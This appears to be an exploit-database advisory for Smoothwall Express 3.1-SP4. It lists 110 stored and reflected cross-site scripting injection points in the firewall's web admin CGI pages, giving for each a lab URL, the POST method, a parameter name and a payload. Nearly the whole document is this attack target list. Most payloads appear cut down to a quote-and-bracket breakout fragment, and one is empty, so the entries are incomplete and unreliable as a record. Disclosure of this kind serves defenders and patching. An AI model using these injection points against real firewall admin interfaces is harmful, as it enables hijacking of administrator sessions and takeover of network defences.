################################################################################################################################## # Exploit Title: Smoothwall Express 3.1-SP4-polar-x86_64-update9 | Cross-Site Scripting # Date: 06.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: http://www.smoothwall.org # Software Link: https://sourceforge.net/projects/smoothwall/files/SmoothWall/3.1%20SP4/Express-3.1-SP4-x86_64.iso/download # Version: 3.1-SP4-polar-x86_64-update9 ################################################################################################################################## Introduction The Smoothwall Open Source Project was set up in 2000 to develop and maintain Smoothwall Express - a Free firewall that includes its own security-hardened GNU/Linux operating system and an easy-to-use web interface. ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Stored URL http://192.168.2.200:81/cgi-bin/proxy.cgi? METHOD Post PARAMETER CACHE_SIZE PAYLOAD '> ################################################################################# XSS2 | Stored URL http://192.168.2.200:81/cgi-bin/proxy.cgi? METHOD Post PARAMETER MAX_SIZE PAYLOAD '> ################################################################################# XSS3 | Stored URL http://192.168.2.200:81/cgi-bin/proxy.cgi? METHOD Post PARAMETER MIN_SIZE PAYLOAD '> ################################################################################# XSS4 | Reflected URL http://192.168.2.200:81/cgi-bin/proxy.cgi? METHOD Post PARAMETER MAX_OUTGOING_SIZE PAYLOAD '> ################################################################################# XSS5 | Stored URL http://192.168.2.200:81/cgi-bin/proxy.cgi? METHOD Post PARAMETER MAX_INCOMING_SIZE PAYLOAD '> ################################################################################# XSS6 | Stored URL http://192.168.2.200:81/cgi-bin/urlfilter.cgi METHOD Post PARAMETER REDIRECT_PAGE PAYLOAD '> ################################################################################# XSS7 | Reflected URL http://192.168.2.200:81/cgi-bin/urlfilter.cgi METHOD Post PARAMETER CHILDREN PAYLOAD '> ################################################################################# XSS8 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER BOOT_SERVER PAYLOAD '> ################################################################################# XSS9 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER BOOT_FILE PAYLOAD '> ################################################################################# XSS10 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER BOOT_ROOT PAYLOAD '> ################################################################################# XSS11 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER START_ADDR PAYLOAD '> ################################################################################# XSS12 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER END_ADDR PAYLOAD '> ################################################################################# XSS13 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER DNS1 PAYLOAD '> ################################################################################# XSS14 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER DNS2 PAYLOAD '> ################################################################################# XSS15 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER NTP1 PAYLOAD '> ################################################################################# XSS16 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER NTP2 PAYLOAD '> ################################################################################# XSS17 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER WINS1 PAYLOAD '> ################################################################################# XSS18 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER WINS2 PAYLOAD '> ################################################################################# XSS19 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER DEFAULT_LEASE_TIME PAYLOAD '> ################################################################################# XSS20 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER MAX_LEASE_TIME PAYLOAD '> ################################################################################# XSS21 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER DOMAIN_NAME PAYLOAD '> ################################################################################# XSS22 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER NIS_DOMAIN PAYLOAD '> ################################################################################# XSS23 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER NIS1 PAYLOAD '> ################################################################################# XSS24 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER NIS2 PAYLOAD '> ################################################################################# XSS25 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER STATIC_HOST PAYLOAD '> ################################################################################# XSS26 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER STATIC_DESC PAYLOAD '> ################################################################################# XSS27 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER STATIC_MAC PAYLOAD '> ################################################################################# XSS28 | Reflected URL http://192.168.2.200:81/cgi-bin/dhcp.cgi? METHOD Post PARAMETER STATIC_IP PAYLOAD '> ################################################################################# XSS29 | Reflected URL http://192.168.2.200:81/cgi-bin/ddns.cgi? METHOD Post PARAMETER HOSTNAME PAYLOAD '> ################################################################################# XSS30 | Reflected URL http://192.168.2.200:81/cgi-bin/ddns.cgi? METHOD Post PARAMETER DOMAIN PAYLOAD '> ################################################################################# XSS31 | Reflected URL http://192.168.2.200:81/cgi-bin/ddns.cgi? METHOD Post PARAMETER LOGIN PAYLOAD '"> ################################################################################# XSS32 | Reflected URL http://192.168.2.200:81/cgi-bin/ddns.cgi? METHOD Post PARAMETER PASSWORD PAYLOAD '> ################################################################################# XSS33 | Reflected URL http://192.168.2.200:81/cgi-bin/ddns.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '> ################################################################################# XSS34 | Reflected URL http://192.168.2.200:81/cgi-bin/hosts.cgi? METHOD Post PARAMETER IP PAYLOAD '"> ################################################################################# XSS35 | Reflected URL http://192.168.2.200:81/cgi-bin/hosts.cgi? METHOD Post PARAMETER HOSTNAME PAYLOAD '> ################################################################################# XSS36 | Reflected URL http://192.168.2.200:81/cgi-bin/hosts.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '> ################################################################################# XSS37 | Reflected URL http://192.168.2.200:81/cgi-bin/time.cgi? METHOD Post PARAMETER NTP_SERVER PAYLOAD '> ################################################################################# XSS38 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER BATTLEVEL PAYLOAD '> ################################################################################# XSS39 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER RTMIN PAYLOAD '> ################################################################################# XSS40 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER BATTDELAY PAYLOAD '> ################################################################################# XSS41 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER TO PAYLOAD '> ################################################################################# XSS42 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER ANNOY PAYLOAD '> ################################################################################# XSS43 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER UPSIP PAYLOAD '> ################################################################################# XSS44 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER UPSNAME PAYLOAD '> ################################################################################# XSS45 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER UPSPORT PAYLOAD '> ################################################################################# XSS46 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER POLLTIME PAYLOAD '> ################################################################################# XSS47 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER UPSUSER PAYLOAD '> ################################################################################# XSS48 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER NISPORT PAYLOAD '> ################################################################################# XSS49 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER UPSAUTH PAYLOAD '> ################################################################################# XSS50 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER EMAIL PAYLOAD '> ################################################################################# XSS51 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER FROM PAYLOAD '> ################################################################################# XSS52 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER CC PAYLOAD '> ################################################################################# XSS53 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER SMSEMAIL PAYLOAD '> ################################################################################# XSS54 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER SMTPSERVER PAYLOAD '> ################################################################################# XSS55 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER PORT PAYLOAD '> ################################################################################# XSS56 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER USER PAYLOAD '> ################################################################################# XSS57 | Reflected URL http://192.168.2.200:81/cgi-bin/apcupsd.cgi? METHOD Post PARAMETER EMAIL_PASSWORD PAYLOAD '"> ################################################################################# XSS58 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER EXT PAYLOAD '> ################################################################################# XSS59 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER SRC_PORT_SEL PAYLOAD '> ################################################################################# XSS60 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER SRC_PORT PAYLOAD '> ################################################################################# XSS61 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER DEST_IP PAYLOAD '> ################################################################################# XSS62 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER DEST_PORT_SEL PAYLOAD '> ################################################################################# XSS63 | Reflected URL http://192.168.2.200:81/cgi-bin/portfw.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '> ################################################################################# XSS64 | Reflected URL http://192.168.2.200:81/cgi-bin/outgoing.cgi? METHOD Post PARAMETER MACHINE PAYLOAD '> ################################################################################# XSS65 | Reflected URL http://192.168.2.200:81/cgi-bin/outgoing.cgi? METHOD Post PARAMETER MACHINECOMMENT PAYLOAD '> ################################################################################# XSS66 | Reflected URL http://192.168.2.200:81/cgi-bin/dmzholes.cgi? METHOD Post PARAMETER SRC_IP PAYLOAD '> ################################################################################# XSS67 | Reflected URL http://192.168.2.200:81/cgi-bin/dmzholes.cgi? METHOD Post PARAMETER DEST_IP PAYLOAD '> ################################################################################# XSS68 | Reflected URL http://192.168.2.200:81/cgi-bin/dmzholes.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '> ################################################################################# XSS69 | Reflected URL http://192.168.2.200:81/cgi-bin/xtaccess.cgi? METHOD Post PARAMETER EXT PAYLOAD '> ################################################################################# XSS70 | Reflected URL http://192.168.2.200:81/cgi-bin/xtaccess.cgi? METHOD Post PARAMETER DEST_PORT PAYLOAD '> ################################################################################# XSS71 | Reflected URL http://192.168.2.200:81/cgi-bin/xtaccess.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '> ################################################################################# XSS72 | Reflected URL http://192.168.2.200:81/cgi-bin/ipblock.cgi? METHOD Post PARAMETER SRC_IP PAYLOAD '> ################################################################################# XSS73 | Reflected URL http://192.168.2.200:81/cgi-bin/ipblock.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '> ################################################################################# XSS74 | Reflected URL http://192.168.2.200:81/cgi-bin/timedaccess.cgi? METHOD Post PARAMETER MACHINES PAYLOAD '> ################################################################################# XSS75 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER GREEN_ADDRESS PAYLOAD '> ################################################################################# XSS76 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER GREEN_NETMASK PAYLOAD '> ################################################################################# XSS77 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER RED_DHCP_HOSTNAME PAYLOAD '> ################################################################################# XSS78 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER RED_ADDRESS PAYLOAD '> ################################################################################# XSS79 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER DNS1_OVERRIDE PAYLOAD '> ################################################################################# XSS80 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER DNS2_OVERRIDE PAYLOAD '> ################################################################################# XSS81 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER RED_MAC PAYLOAD '> ################################################################################# XSS82 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER RED_NETMASK PAYLOAD '> ################################################################################# XSS83 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER DEFAULT_GATEWAY PAYLOAD '> ################################################################################# XSS84 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER DNS1 PAYLOAD '> ################################################################################# XSS85 | Reflected URL http://192.168.2.200:81/cgi-bin/interfaces.cgi? METHOD Post PARAMETER DNS2 PAYLOAD '> ################################################################################# XSS86 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER NAME PAYLOAD '> ################################################################################# XSS87 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER LEFT PAYLOAD '> ################################################################################# XSS88 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER LEFT_SUBNET PAYLOAD '> ################################################################################# XSS89 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER RIGHT PAYLOAD '> ################################################################################# XSS90 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER RIGHT_SUBNET PAYLOAD '> ################################################################################# XSS91 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER SECRET1 PAYLOAD '> ################################################################################# XSS92 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER SECRET2 PAYLOAD '> ################################################################################# XSS93 | Reflected URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER COMMENT PAYLOAD '> ################################################################################# XSS94 | Stored URL http://192.168.2.200:81/cgi-bin/vpnconn.cgi? METHOD Post PARAMETER filename PAYLOAD ################################################################################# XSS95 | Reflected URL http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat METHOD Post PARAMETER SOURCE_IP PAYLOAD "> ################################################################################# XSS96 | Stored URL http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat METHOD Post PARAMETER FILTER PAYLOAD '> ################################################################################# XSS97 | Reflected URL http://192.168.2.200:81/cgi-bin/ipinfo.cgi? METHOD Post PARAMETER IP PAYLOAD '> ################################################################################# XSS98 | Reflected URL http://192.168.2.200:81/cgi-bin/iptools.cgi? METHOD Post PARAMETER IP PAYLOAD '> ################################################################################# XSS99 | Reflected URL http://192.168.2.200:81/cgi-bin/smoothinfo.cgi? METHOD Post PARAMETER WRAP PAYLOAD '> ################################################################################# XSS100 | Reflected URL http://192.168.2.200:81/cgi-bin/smoothinfo.cgi? METHOD Post PARAMETER SECTIONTITLE PAYLOAD '> ################################################################################# XSS101 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER INIT PAYLOAD '> ################################################################################# XSS102 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER HANGUP PAYLOAD '> ################################################################################# XSS103 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER SPEAKER_ON PAYLOAD '> ################################################################################# XSS104 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER SPEAKER_OFF PAYLOAD '> ################################################################################# XSS105 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER TONE_DIAL PAYLOAD '> ################################################################################# XSS106 | Stored URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER PULSE_DIAL PAYLOAD '> ################################################################################# XSS107 | Reflected URL http://192.168.2.200:81/cgi-bin/modem.cgi? METHOD Post PARAMETER TIMEOUT PAYLOAD '> ################################################################################# XSS108 | Stored URL http://192.168.2.200:81/cgi-bin/preferences.cgi? METHOD Post PARAMETER HOSTNAME PAYLOAD '> ################################################################################# XSS109 | Stored URL http://192.168.2.200:81/cgi-bin/preferences.cgi? METHOD Post PARAMETER KEYMAP PAYLOAD '> ################################################################################# XSS110 | Stored URL http://192.168.2.200:81/cgi-bin/preferences.cgi? METHOD Post PARAMETER OPENNESS PAYLOAD '> #################################################################################